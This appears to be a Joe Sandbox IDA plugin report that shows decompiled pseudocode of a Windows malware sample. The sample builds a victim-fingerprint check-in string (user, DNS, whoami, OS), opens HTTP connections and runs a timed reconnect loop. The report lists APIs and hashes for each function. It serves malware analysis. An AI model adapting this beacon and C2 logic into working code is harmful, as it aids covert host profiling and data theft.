              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: SectionView
              • String ID:
              • API String ID: 1323581903-0
              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
              • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 69%
              			E02CE3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				void* _v48;
              				intOrPtr _v56;
              				void* __edi;
              				intOrPtr _t30;
              				void* _t31;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				intOrPtr _t35;
              				intOrPtr _t36;
              				intOrPtr _t37;
              				void* _t40;
              				intOrPtr _t41;
              				int _t44;
              				intOrPtr _t45;
              				int _t48;
              				void* _t49;
              				intOrPtr _t53;
              				intOrPtr _t59;
              				intOrPtr _t63;
              				intOrPtr* _t65;
              				void* _t66;
              				intOrPtr _t71;
              				intOrPtr _t77;
              				intOrPtr _t80;
              				intOrPtr _t83;
              				int _t86;
              				intOrPtr _t88;
              				int _t91;
              				intOrPtr _t93;
              				int _t96;
              				void* _t98;
              				void* _t99;
              				void* _t103;
              				void* _t105;
              				void* _t106;
              				intOrPtr _t107;
              				long _t109;
              				intOrPtr* _t110;
              				intOrPtr* _t111;
              				long _t112;
              				int _t113;
              				void* _t114;
              				void* _t115;
              				void* _t116;
              				void* _t119;
              				void* _t120;
              				void* _t122;
              				void* _t123;
              
              				_t103 = __edx;
              				_t99 = __ecx;
              				_t120 =  &_v16;
              				_t112 = __eax;
              				_t30 =  *0x2cea3e0; // 0x5259c00
              				_v4 = _t30;
              				_v8 = 8;
              				_t31 = RtlAllocateHeap( *0x2cea2d8, 0, 0x800); // executed
              				_t98 = _t31;
              				if(_t98 != 0) {
              					if(_t112 == 0) {
              						_t112 = GetTickCount();
              					}
              					_t33 =  *0x2cea018; // 0x9300c086
              					asm("bswap eax");
              					_t34 =  *0x2cea014; // 0x3a87c8cd
              					asm("bswap eax");
              					_t35 =  *0x2cea010; // 0xd8d2f808
              					asm("bswap eax");
              					_t36 =  *0x2cea00c; // 0x81762942
              					asm("bswap eax");
              					_t37 =  *0x2cea348; // 0x256d5a8
              					_t3 = _t37 + 0x2ceb5ac; // 0x74666f73
              					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x2cea02c,  *0x2cea004, _t112);
              					_t40 = E02CE467F();
              					_t41 =  *0x2cea348; // 0x256d5a8
              					_t4 = _t41 + 0x2ceb575; // 0x74707526
              					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
              					_t122 = _t120 + 0x38;
              					_t114 = _t113 + _t44;
              					if(_a12 != 0) {
              						_t93 =  *0x2cea348; // 0x256d5a8
              						_t8 = _t93 + 0x2ceb508; // 0x732526
              						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
              						_t122 = _t122 + 0xc;
              						_t114 = _t114 + _t96;
              					}
              					_t45 =  *0x2cea348; // 0x256d5a8
              					_t10 = _t45 + 0x2ceb246; // 0x74636126
              					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
              					_t123 = _t122 + 0xc;
              					_t115 = _t114 + _t48; // executed
              					_t49 = E02CE472F(_t99); // executed
              					_t105 = _t49;
              					if(_t105 != 0) {
              						_t88 =  *0x2cea348; // 0x256d5a8
              						_t12 = _t88 + 0x2ceb8d0; // 0x736e6426
              						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
              						_t123 = _t123 + 0xc;
              						_t115 = _t115 + _t91;
              						HeapFree( *0x2cea2d8, 0, _t105);
              					}
              					_t106 = E02CE1340();
              					if(_t106 != 0) {
              						_t83 =  *0x2cea348; // 0x256d5a8
              						_t14 = _t83 + 0x2ceb8c5; // 0x6f687726
              						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
              						_t123 = _t123 + 0xc;
              						_t115 = _t115 + _t86;
              						HeapFree( *0x2cea2d8, 0, _t106);
              					}
              					_t107 =  *0x2cea3cc; // 0x5259600
              					_a20 = E02CE6B59(0x2cea00a, _t107 + 4);
              					_t53 =  *0x2cea36c; // 0x52595b0
              					_t109 = 0;
              					if(_t53 != 0) {
              						_t80 =  *0x2cea348; // 0x256d5a8
              						_t17 = _t80 + 0x2ceb8be; // 0x3d736f26
              						wsprintfA(_t115 + _t98, _t17, _t53);
              					}
              					if(_a20 != _t109) {
              						_t116 = RtlAllocateHeap( *0x2cea2d8, _t109, 0x800);
              						if(_t116 != _t109) {
              							E02CE2915(GetTickCount());
              							_t59 =  *0x2cea3cc; // 0x5259600
              							__imp__(_t59 + 0x40);
              							asm("lock xadd [eax], ecx");
              							_t63 =  *0x2cea3cc; // 0x5259600
              							__imp__(_t63 + 0x40);
              							_t65 =  *0x2cea3cc; // 0x5259600
              							_t66 = E02CE6675(1, _t103, _t98,  *_t65); // executed
              							_t119 = _t66;
              							asm("lock xadd [eax], ecx");
              							if(_t119 != _t109) {
              								StrTrimA(_t119, 0x2ce9280);
              								_push(_t119);
              								_t71 = E02CE7563();
              								_v20 = _t71;
              								if(_t71 != _t109) {
              									_t110 = __imp__;
              									 *_t110(_t119, _v8);
              									 *_t110(_t116, _v8);
              									_t111 = __imp__;
              									 *_t111(_t116, _v32);
              									 *_t111(_t116, _t119);
              									_t77 = E02CE21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
              									_v56 = _t77;
              									if(_t77 != 0 && _t77 != 0x10d2) {
              										E02CE63F6();
              									}
              									HeapFree( *0x2cea2d8, 0, _v48);
              									_t109 = 0;
              								}
              								HeapFree( *0x2cea2d8, _t109, _t119);
              							}
              							RtlFreeHeap( *0x2cea2d8, _t109, _t116); // executed
              						}
              						HeapFree( *0x2cea2d8, _t109, _a12);
              					}
              					RtlFreeHeap( *0x2cea2d8, _t109, _t98); // executed
              				}
              				return _v16;
              			}


























































              0x02ce3ce0
              0x02ce3ce0
              0x02ce3ce0
              0x02ce3cf5
              0x02ce3cf7
              0x02ce3cfc
              0x02ce3d00
              0x02ce3d08
              0x02ce3d0e
              0x02ce3d12
              0x02ce3d1a
              0x02ce3d22
              0x02ce3d22
              0x02ce3d24
              0x02ce3d30
              0x02ce3d3f
              0x02ce3d44
              0x02ce3d47
              0x02ce3d4c
              0x02ce3d4f
              0x02ce3d54
              0x02ce3d57
              0x02ce3d63
              0x02ce3d70
              0x02ce3d72
              0x02ce3d78
              0x02ce3d7d
              0x02ce3d88
              0x02ce3d8a
              0x02ce3d8d
              0x02ce3d93
              0x02ce3d95
              0x02ce3d9e
              0x02ce3da9
              0x02ce3dab
              0x02ce3dae
              0x02ce3dae
              0x02ce3db0
              0x02ce3db5
              0x02ce3dc1
              0x02ce3dc3
              0x02ce3dc6
              0x02ce3dc8
              0x02ce3dcd
              0x02ce3dd1
              0x02ce3dd3
              0x02ce3dd8
              0x02ce3de4
              0x02ce3de6
              0x02ce3df2
              0x02ce3df4
              0x02ce3df4
              0x02ce3dff
              0x02ce3e03
              0x02ce3e05
              0x02ce3e0a
              0x02ce3e16
              0x02ce3e18
              0x02ce3e24
              0x02ce3e26
              0x02ce3e26
              0x02ce3e2c
              0x02ce3e3f
              0x02ce3e43
              0x02ce3e48
              0x02ce3e4c
              0x02ce3e4f
              0x02ce3e54
              0x02ce3e5e
              0x02ce3e60
              0x02ce3e67
              0x02ce3e7f
              0x02ce3e83
              0x02ce3e8f
              0x02ce3e94
              0x02ce3e9d
              0x02ce3eae
              0x02ce3eb2
              0x02ce3ebb
              0x02ce3ec1
              0x02ce3ec9
              0x02ce3ece
              0x02ce3edb
              0x02ce3ee1
              0x02ce3eed
              0x02ce3ef3
              0x02ce3ef4
              0x02ce3ef9
              0x02ce3eff
              0x02ce3f05
              0x02ce3f0c
              0x02ce3f13
              0x02ce3f19
              0x02ce3f20
              0x02ce3f24
              0x02ce3f2f
              0x02ce3f34
              0x02ce3f3a
              0x02ce3f43
              0x02ce3f43
              0x02ce3f54
              0x02ce3f5a
              0x02ce3f5a
              0x02ce3f64
              0x02ce3f64
              0x02ce3f72
              0x02ce3f72
              0x02ce3f83
              0x02ce3f83
              0x02ce3f91
              0x02ce3f91
              0x02ce3fa2

              APIs
              • RtlAllocateHeap.NTDLL ref: 02CE3D08
              • GetTickCount.KERNEL32 ref: 02CE3D1C
              • wsprintfA.USER32 ref: 02CE3D6B
              • wsprintfA.USER32 ref: 02CE3D88
              • wsprintfA.USER32 ref: 02CE3DA9
              • wsprintfA.USER32 ref: 02CE3DC1
              • wsprintfA.USER32 ref: 02CE3DE4
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE3DF4
              • wsprintfA.USER32 ref: 02CE3E16
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE3E26
              • wsprintfA.USER32 ref: 02CE3E5E
              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02CE3E79
              • GetTickCount.KERNEL32 ref: 02CE3E89
              • RtlEnterCriticalSection.NTDLL(052595C0), ref: 02CE3E9D
              • RtlLeaveCriticalSection.NTDLL(052595C0), ref: 02CE3EBB
                • Part of subcall function 02CE6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A0
                • Part of subcall function 02CE6675: lstrlen.KERNEL32(00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A8
                • Part of subcall function 02CE6675: strcpy.NTDLL ref: 02CE66BF
                • Part of subcall function 02CE6675: lstrcat.KERNEL32(00000000,00000000), ref: 02CE66CA
                • Part of subcall function 02CE6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66E7
              • StrTrimA.SHLWAPI(00000000,02CE9280,00000000,05259600), ref: 02CE3EED
                • Part of subcall function 02CE7563: lstrlen.KERNEL32(05259BF0,00000000,00000000,00000000,02CE3EF9,00000000), ref: 02CE7573
                • Part of subcall function 02CE7563: lstrlen.KERNEL32(?), ref: 02CE757B
                • Part of subcall function 02CE7563: lstrcpy.KERNEL32(00000000,05259BF0), ref: 02CE758F
                • Part of subcall function 02CE7563: lstrcat.KERNEL32(00000000,?), ref: 02CE759A
              • lstrcpy.KERNEL32(00000000,?), ref: 02CE3F0C
              • lstrcpy.KERNEL32(00000000,?), ref: 02CE3F13
              • lstrcat.KERNEL32(00000000,?), ref: 02CE3F20
              • lstrcat.KERNEL32(00000000,00000000), ref: 02CE3F24
                • Part of subcall function 02CE21A6: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02CE2258
              • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02CE3F54
              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02CE3F64
              • RtlFreeHeap.NTDLL(00000000,00000000,00000000,05259600), ref: 02CE3F72
              • HeapFree.KERNEL32(00000000,?), ref: 02CE3F83
              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02CE3F91
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
              • String ID: Uqt
              • API String ID: 186568778-2320327147
              • Opcode ID: ee46a7249f773e955745ec8e02f9500aa33df9667a32462e20017eb8c4b3d591
              • Instruction ID: 2104264636bc4cc638ef351ad09068a59805a2aff90450a1069e0079b691789d
              • Opcode Fuzzy Hash: ee46a7249f773e955745ec8e02f9500aa33df9667a32462e20017eb8c4b3d591
              • Instruction Fuzzy Hash: 1471A272940244EFCF21AB65DC48F6B3BF9EB88714B150B54F50ADB210D732EA24DBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 92%
              			E02CE7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
              				void _v8;
              				long _v12;
              				void _v16;
              				void* _t34;
              				void* _t38;
              				void* _t40;
              				char* _t56;
              				long _t57;
              				void* _t58;
              				intOrPtr _t59;
              				long _t65;
              
              				_t65 = __esi;
              				_t58 = __ecx;
              				_v16 = 0xea60;
              				__imp__( *(__esi + 4));
              				_v12 = __eax + __eax;
              				_t56 = E02CE33DC(__eax + __eax + 1);
              				if(_t56 != 0) {
              					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
              						E02CE61DA(_t56);
              					} else {
              						E02CE61DA( *(__esi + 4));
              						 *(__esi + 4) = _t56;
              					}
              				}
              				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
              				 *(_t65 + 0x10) = _t34;
              				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02CE7B18) == 0xffffffff) {
              					L15:
              					return GetLastError();
              				} else {
              					ResetEvent( *(_t65 + 0x1c));
              					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
              					 *(_t65 + 0x14) = _t38;
              					if(_t38 != 0 || GetLastError() == 0x3e5 && E02CE16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
              						_t59 =  *0x2cea348; // 0x256d5a8
              						_t15 = _t59 + 0x2ceb845; // 0x544547
              						_v8 = 0x84404000;
              						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
              						 *(_t65 + 0x18) = _t40;
              						if(_t40 == 0) {
              							goto L15;
              						}
              						_t57 = 4;
              						_v12 = _t57;
              						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
              							_v8 = _v8 | 0x00000100;
              							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
              						}
              						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
              							goto L15;
              						} else {
              							return 0;
              						}
              					} else {
              						goto L15;
              					}
              				}
              			}














              0x02ce7b83
              0x02ce7b83
              0x02ce7b8e
              0x02ce7b95
              0x02ce7b9d
              0x02ce7ba7
              0x02ce7bad
              0x02ce7bc0
              0x02ce7bd0
              0x02ce7bc2
              0x02ce7bc5
              0x02ce7bca
              0x02ce7bca
              0x02ce7bc0
              0x02ce7be0
              0x02ce7be6
              0x02ce7beb
              0x02ce7cd4
              0x00000000
              0x02ce7c06
              0x02ce7c09
              0x02ce7c1c
              0x02ce7c22
              0x02ce7c27
              0x02ce7c4f
              0x02ce7c62
              0x02ce7c6c
              0x02ce7c6f
              0x02ce7c75
              0x02ce7c7a
              0x00000000
              0x00000000
              0x02ce7c7e
              0x02ce7c8a
              0x02ce7c9b
              0x02ce7c9d
              0x02ce7cae
              0x02ce7cae
              0x02ce7cbe
              0x00000000
              0x02ce7cd0
              0x00000000
              0x02ce7cd0
              0x00000000
              0x00000000
              0x00000000
              0x02ce7c27

              APIs
              • lstrlen.KERNEL32(?,00000008,74714D40), ref: 02CE7B95
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02CE7BB8
              • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02CE7BE0
              • InternetSetStatusCallback.WININET(00000000,02CE7B18), ref: 02CE7BF7
              • ResetEvent.KERNEL32(?), ref: 02CE7C09
              • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02CE7C1C
              • GetLastError.KERNEL32 ref: 02CE7C29
              • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02CE7C6F
              • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02CE7C8D
              • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02CE7CAE
              • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02CE7CBA
              • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02CE7CCA
              • GetLastError.KERNEL32 ref: 02CE7CD4
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
              • String ID: @MqtNqt
              • API String ID: 2290446683-2883916605
              • Opcode ID: 2ca43474bad505a9c69633317a83ee7180db38a7febd2d9b16e8a64d0f5699cf
              • Instruction ID: af7d181d5b1f4be32a665346d51d32946f5de536007a82b52a31256d8b7ea502
              • Opcode Fuzzy Hash: 2ca43474bad505a9c69633317a83ee7180db38a7febd2d9b16e8a64d0f5699cf
              • Instruction Fuzzy Hash: 57417E71940644FFEF319F65DD48E6BBBBDEB84704B104A68F603D6190E730A659DB20
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 147 2ce6815-2ce6847 memset CreateWaitableTimerA 148 2ce684d-2ce68a6 _allmul SetWaitableTimer WaitForMultipleObjects 147->148 149 2ce69c8-2ce69ce 147->149 150 2ce68ac-2ce68af 148->150 151 2ce6930-2ce6936 148->151 156 2ce69d2-2ce69dc 149->156 153 2ce68ba 150->153 154 2ce68b1 call 2ce5251 150->154 155 2ce6937-2ce693b 151->155 160 2ce68c4 153->160 162 2ce68b6-2ce68b8 154->162 158 2ce693d-2ce693f 155->158 159 2ce694b-2ce694f 155->159 158->159 159->155 163 2ce6951-2ce695b CloseHandle 159->163 161 2ce68c8-2ce68cd 160->161 164 2ce68cf-2ce68d6 161->164 165 2ce68e0-2ce690d call 2ce35d2 161->165 162->153 162->160 163->156 164->165 166 2ce68d8 164->166 169 2ce690f-2ce691a 165->169 170 2ce695d-2ce6962 165->170 166->165 169->161 173 2ce691c-2ce692c call 2ce69e6 169->173 171 2ce6964-2ce696a 170->171 172 2ce6981-2ce6989 170->172 171->151 174 2ce696c-2ce697f call 2ce63f6 171->174 175 2ce698f-2ce69bd _allmul SetWaitableTimer WaitForMultipleObjects 172->175 173->151 174->175 175->161 178 2ce69c3 175->178 178->151
              C-Code - Quality: 83%
              			E02CE6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
              				void _v48;
              				long _v52;
              				struct %anon52 _v60;
              				char _v72;
              				long _v76;
              				void* _v80;
              				union _LARGE_INTEGER _v84;
              				struct %anon52 _v92;
              				void* _v96;
              				void* _v100;
              				union _LARGE_INTEGER _v104;
              				long _v108;
              				struct %anon52 _v124;
              				long _v128;
              				struct %anon52 _t46;
              				void* _t51;
              				long _t53;
              				void* _t54;
              				struct %anon52 _t61;
              				long _t65;
              				struct %anon52 _t66;
              				void* _t69;
              				void* _t73;
              				signed int _t74;
              				void* _t76;
              				void* _t78;
              				void** _t82;
              				signed int _t86;
              				void* _t89;
              
              				_t76 = __edx;
              				_v52 = 0;
              				memset( &_v48, 0, 0x2c);
              				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
              				_t46 = CreateWaitableTimerA(0, 1, 0);
              				_v60 = _t46;
              				if(_t46 == 0) {
              					_v92.HighPart = GetLastError();
              				} else {
              					_push(0xffffffff);
              					_push(0xff676980);
              					_push(0);
              					_push( *0x2cea2e0);
              					_v76 = 0;
              					_v80 = 0;
              					L02CE82DA();
              					_v84.LowPart = _t46;
              					_v80 = _t76;
              					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
              					_t51 =  *0x2cea30c; // 0x1ac
              					_v76 = _t51;
              					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
              					_v108 = _t53;
              					if(_t53 == 0) {
              						if(_a8 != 0) {
              							L4:
              							 *0x2cea2ec = 5;
              						} else {
              							_t69 = E02CE5251(_t76); // executed
              							if(_t69 != 0) {
              								goto L4;
              							}
              						}
              						_v104.LowPart = 0;
              						L6:
              						L6:
              						if(_v104.LowPart == 1 && ( *0x2cea300 & 0x00000001) == 0) {
              							_v104.LowPart = 2;
              						}
              						_t74 = _v104.LowPart;
              						_t58 = _t74 << 4;
              						_t78 = _t89 + (_t74 << 4) + 0x38;
              						_t75 = _t74 + 1;
              						_v92.LowPart = _t74 + 1;
              						_t61 = E02CE35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
              						_v124 = _t61;
              						if(_t61 != 0) {
              							goto L17;
              						}
              						_t66 = _v92;
              						_v104.LowPart = _t66;
              						if(_t66 != 3) {
              							goto L6;
              						} else {
              							_v124.HighPart = E02CE69E6(_t75,  &_v72, _a4, _a8);
              						}
              						goto L12;
              						L17:
              						__eflags = _t61 - 0x10d2;
              						if(_t61 != 0x10d2) {
              							_push(0xffffffff);
              							_push(0xff676980);
              							_push(0);
              							_push( *0x2cea2e4);
              							goto L21;
              						} else {
              							__eflags =  *0x2cea2e8; // 0x0
              							if(__eflags == 0) {
              								goto L12;
              							} else {
              								_t61 = E02CE63F6();
              								_push(0xffffffff);
              								_push(0xdc3cba00);
              								_push(0);
              								_push( *0x2cea2e8);
              								L21:
              								L02CE82DA();
              								_v104.LowPart = _t61;
              								_v100 = _t78;
              								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
              								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
              								_v128 = _t65;
              								__eflags = _t65;
              								if(_t65 == 0) {
              									goto L6;
              								} else {
              									goto L12;
              								}
              							}
              						}
              						L25:
              					}
              					L12:
              					_t82 =  &_v72;
              					_t73 = 3;
              					do {
              						_t54 =  *_t82;
              						if(_t54 != 0) {
              							HeapFree( *0x2cea2d8, 0, _t54);
              						}
              						_t82 =  &(_t82[4]);
              						_t73 = _t73 - 1;
              					} while (_t73 != 0);
              					CloseHandle(_v80);
              				}
              				return _v92.HighPart;
              				goto L25;
              			}
































              0x02ce6815
              0x02ce682b
              0x02ce682f
              0x02ce6834
              0x02ce683b
              0x02ce6841
              0x02ce6847
              0x02ce69ce
              0x02ce684d
              0x02ce684d
              0x02ce684f
              0x02ce6854
              0x02ce6855
              0x02ce685b
              0x02ce685f
              0x02ce6863
              0x02ce6871
              0x02ce687f
              0x02ce6883
              0x02ce6885
              0x02ce6892
              0x02ce689e
              0x02ce68a0
              0x02ce68a6
              0x02ce68af
              0x02ce68ba
              0x02ce68ba
              0x02ce68b1
              0x02ce68b1
              0x02ce68b8
              0x00000000
              0x00000000
              0x02ce68b8
              0x02ce68c4
              0x00000000
              0x02ce68c8
              0x02ce68cd
              0x02ce68d8
              0x02ce68d8
              0x02ce68e0
              0x02ce68e6
              0x02ce68ee
              0x02ce68f7
              0x02ce68fe
              0x02ce6902
              0x02ce6907
              0x02ce690d
              0x00000000
              0x00000000
              0x02ce690f
              0x02ce6913
              0x02ce691a
              0x00000000
              0x02ce691c
              0x02ce692c
              0x02ce692c
              0x00000000
              0x02ce695d
              0x02ce695d
              0x02ce6962
              0x02ce6981
              0x02ce6983
              0x02ce6988
              0x02ce6989
              0x00000000
              0x02ce6964
              0x02ce6964
              0x02ce696a
              0x00000000
              0x02ce696c
              0x02ce696c
              0x02ce6971
              0x02ce6973
              0x02ce6978
              0x02ce6979
              0x02ce698f
              0x02ce698f
              0x02ce6997
              0x02ce69a5
              0x02ce69a9
              0x02ce69b5
              0x02ce69b7
              0x02ce69bb
              0x02ce69bd
              0x00000000
              0x02ce69c3
              0x00000000
              0x02ce69c3
              0x02ce69bd
              0x02ce696a
              0x00000000
              0x02ce6962
              0x02ce6930
              0x02ce6932
              0x02ce6936
              0x02ce6937
              0x02ce6937
              0x02ce693b
              0x02ce6945
              0x02ce6945
              0x02ce694b
              0x02ce694e
              0x02ce694e
              0x02ce6955
              0x02ce6955
              0x02ce69dc
              0x00000000

              APIs
              • memset.NTDLL ref: 02CE682F
              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02CE683B
              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02CE6863
              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02CE6883
              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02CE26E9,?), ref: 02CE689E
              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02CE26E9,?,00000000), ref: 02CE6945
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02CE26E9,?,00000000,?,?), ref: 02CE6955
              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02CE698F
              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02CE69A9
              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02CE69B5
                • Part of subcall function 02CE5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05259218,00000000,?,7476F710,00000000,7476F730), ref: 02CE52A0
                • Part of subcall function 02CE5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05259160,?,00000000,30314549,00000014,004F0053,05259270), ref: 02CE533D
                • Part of subcall function 02CE5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02CE68B6), ref: 02CE534F
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02CE26E9,?,00000000,?,?), ref: 02CE69C8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
              • String ID: Uqt$@MqtNqt
              • API String ID: 3521023985-3266969629
              • Opcode ID: b8fafade52d73334b57bc7a0fc5bc1cdda2f586e491e36919ba0245d68d84d7f
              • Instruction ID: 6c613afe7dd48f9e7afb4ae059c1b7905420f42f8d10b16c9cbf74046de94ffb
              • Opcode Fuzzy Hash: b8fafade52d73334b57bc7a0fc5bc1cdda2f586e491e36919ba0245d68d84d7f
              • Instruction Fuzzy Hash: 69518E71458310AFCB11DF11CC44EABBBECEF98324F604A1AF4AA96290C730C654CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
